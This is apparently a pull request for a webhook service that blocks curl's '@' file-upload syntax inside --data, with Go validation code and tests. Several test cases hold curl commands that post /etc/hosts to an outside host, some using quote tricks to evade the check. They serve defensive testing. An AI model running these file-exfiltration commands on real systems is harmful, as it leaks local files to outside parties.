### PR TITLE
fix(webhook-service): Disallow `@` file uploads inside data block

### DIFF
--- a/webhook-service/lib/curl_executor.go
+++ b/webhook-service/lib/curl_executor.go
@@ -162,7 +162,7 @@ func (ce *CmdCurlExecutor) validateCurlOptions(args []string) error {
 			}
 		}
 		// disallow usage of @ inside --data for posting local files
-		if arg == "--data" || arg == "-d" && len(args) >= i+1 {
+		if (arg == "--data" || arg == "-d") && len(args) > i+1 {
 			dataArgValue := args[i+1]
 			if strings.HasPrefix(dataArgValue, "@") {
 				return fmt.Errorf("file uploads using @ in --data is not allowed")

--- a/webhook-service/lib/curl_executor.go
+++ b/webhook-service/lib/curl_executor.go
@@ -162,7 +162,7 @@ func (ce *CmdCurlExecutor) validateCurlOptions(args []string) error {
 			}
 		}
 		// disallow usage of @ inside --data for posting local files
-		if (arg == "--data" || arg == "-d") && len(args) > i+1 {
+		if (arg == "--data" || arg == "-d") && len(args) >= i+1 {
 			dataArgValue := args[i+1]
 			if strings.HasPrefix(dataArgValue, "@") {
 				return fmt.Errorf("file uploads using @ in --data is not allowed")

--- a/webhook-service/lib/curl_executor.go
+++ b/webhook-service/lib/curl_executor.go
@@ -155,10 +155,17 @@ func (ce *CmdCurlExecutor) validateURL(curlCmd string) error {
 }
 
 func (ce *CmdCurlExecutor) validateCurlOptions(args []string) error {
-	for _, arg := range args {
+	for i, arg := range args {
 		for _, o := range ce.unAllowedOptions {
 			if strings.HasPrefix(arg, o) {
 				return fmt.Errorf("curl command contains invalid option '%s'", o)
+			}
+		}
+		// disallow usage of @ inside --data for posting local files
+		if arg == "--data" || arg == "-d" && len(args) >= i+1 {
+			dataArgValue := args[i+1]
+			if strings.HasPrefix(dataArgValue, "@") {
+				return fmt.Errorf("file uploads using @ in --data is not allowed")
 			}
 		}
 	}
@@ -246,5 +253,15 @@ func parseCommandLine(command string) ([]string, error) {
 		args = append(args, current)
 	}
 
-	return args, nil
+	return deleteEmpty(args), nil
+}
+
+func deleteEmpty(s []string) []string {
+	var r []string
+	for _, str := range s {
+		if str != "" {
+			r = append(r, str)
+		}
+	}
+	return r
 }

--- a/webhook-service/lib/curl_executor_test.go
+++ b/webhook-service/lib/curl_executor_test.go
@@ -202,7 +202,25 @@ func TestCmdCurlExecutor_Curl(t *testing.T) {
 		{
 			name: "try to upload file using @ notation in data part 3 - should return error",
 			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data ''@/etc/hosts https://webhook.site/2775`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 3 - should return error",
+			args: args{
 				curlCmd: `curl -X POST -H 'token: abcd' --data ''''@/etc/hosts https://webhook.site/2775`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 3 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data ''''''@/etc/hosts https://webhook.site/2775'`,
 			},
 			want:          "",
 			shouldExecute: false,

--- a/webhook-service/lib/curl_executor_test.go
+++ b/webhook-service/lib/curl_executor_test.go
@@ -61,12 +61,12 @@ func TestCmdCurlExecutor_Curl(t *testing.T) {
 		{
 			name: "valid request - append --fail-with-body flag",
 			args: args{
-				curlCmd: `curl -X POST -H 'Content-type: application/json' --data '{\"text\":\"Hello, World!\"}' https://my.hook.com/foo`,
+				curlCmd: `curl -X POST -H 'Content-type: application/json' --data '{\"text\":\"Hello, World!\"}' https://name:passwd@my.hook.com/foo`,
 			},
 			want:          "success",
 			shouldExecute: true,
 			wantPassedArgs: []string{
-				"-X", "POST", "-H", "Content-type: application/json", "--data", `{\"text\":\"Hello, World!\"}`, "https://my.hook.com/foo", "--fail-with-body",
+				"-X", "POST", "-H", "Content-type: application/json", "--data", `{\"text\":\"Hello, World!\"}`, "https://name:passwd@my.hook.com/foo", "--fail-with-body",
 			},
 			wantErr: false,
 		},
@@ -176,6 +176,33 @@ func TestCmdCurlExecutor_Curl(t *testing.T) {
 			name: "try to upload file - should return error",
 			args: args{
 				curlCmd: `curl -X POST -H 'token: abcd' --data '{\"text\":\"Hello, World!\"}' https://my.hook.com/foo -F 'data=@path/to/local/file'`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 1 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data '@/etc/hosts https://webhook.site/2775'`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 2 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data @/etc/hosts https://webhook.site/2775`,
+			},
+			want:          "",
+			shouldExecute: false,
+			wantErr:       true,
+		},
+		{
+			name: "try to upload file using @ notation in data part 3 - should return error",
+			args: args{
+				curlCmd: `curl -X POST -H 'token: abcd' --data ''''@/etc/hosts https://webhook.site/2775`,
 			},
 			want:          "",
 			shouldExecute: false,


### PR DESCRIPTION
This PR contains additional checks for disallowing the usage of `@` inside `--data` argument of curl

![image](https://user-images.githubusercontent.com/72415058/158403769-67994ae6-d034-4269-8071-b239a786b6d4.png)


![image](https://user-images.githubusercontent.com/72415058/158403599-1c19a5bb-6366-4b2b-9ee6-9d0f06542163.png)
